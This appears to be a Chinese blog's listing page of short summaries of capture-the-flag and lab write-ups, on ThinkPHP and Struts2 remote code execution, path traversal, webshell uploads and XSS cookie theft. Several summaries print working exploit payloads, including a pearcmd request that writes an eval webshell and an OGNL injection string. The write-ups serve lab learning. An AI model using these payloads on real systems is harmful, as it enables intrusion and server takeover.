摘要: CVE-2018-20062复现 打开网站 判断是否存在漏洞,访问/index.php?s=captcha页面,会出现报错 利用post请求,执行命令 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls / 阅读全文
posted @ 2026-02-03 19:51 大雪深埋 阅读(1) 评论(0) 推荐(0)
摘要: 使用上一关密码ssh连接 ssh -p 2220 bandit11@bandit.labs.overthewire.org ls查看到一个data.txt文件,cat一下 题目提示rot13,rot13就是将每个字母替换为字母表中向后13位的字母 echo "Gur cnffjbeq vf 7k16 阅读全文
posted @ 2026-02-01 13:50 大雪深埋 阅读(2) 评论(0) 推荐(0)
摘要: 可以使用..%2f..%2f..%2f..%2f..%2fetc/passwd来读取敏感信息 flag一进去在phpinfo页面能直接看到 阅读全文
posted @ 2026-01-28 20:41 大雪深埋 阅读(3) 评论(0) 推荐(0)
摘要: 首先使用bp抓包, 返回包提示发生错误,证明被记入了日志。 该日志默认路径在:(日志文件名与记录的时间有关) \Application\Runtime\Logs\Common\26_01_28.log 完整payload /index.php?m=Home&c=Index&a=index&value 阅读全文
posted @ 2026-01-28 10:22 大雪深埋 阅读(1) 评论(0) 推荐(0)
摘要: web311 web312 web313 web314 web315 web316 反射型xss 方法一:利用在线平台https://xssaq.com/dashboard 方法二:自己搭服务器,用来接受cookie <?php $cookie = $_GET['cookie']; $time = 阅读全文
posted @ 2026-01-22 15:03 大雪深埋 阅读(9) 评论(0) 推荐(0)
摘要: 使用网上的exp /public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php 要 阅读全文
posted @ 2026-01-21 16:53 大雪深埋 阅读(4) 评论(0) 推荐(0)
摘要: 直接使用网络上的exp (%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org. 阅读全文
posted @ 2026-01-21 14:19 大雪深埋 阅读(3) 评论(0) 推荐(0)
摘要: 使用弱口令登录,账号密码都是tomcat 使用哥斯拉生成jsp木马 使用jar cvf abc.war test.jsp生成war包 ![image] 上传war包,哥斯拉连接 查看flag 阅读全文
posted @ 2026-01-21 13:21 大雪深埋 阅读(3) 评论(0) 推荐(0)
摘要: 利用网上的exp (%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apa 阅读全文
posted @ 2026-01-20 20:57 大雪深埋 阅读(2) 评论(0) 推荐(0)
摘要: exp ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp 阅读全文
posted @ 2026-01-20 20:42 大雪深埋 阅读(4) 评论(0) 推荐(0)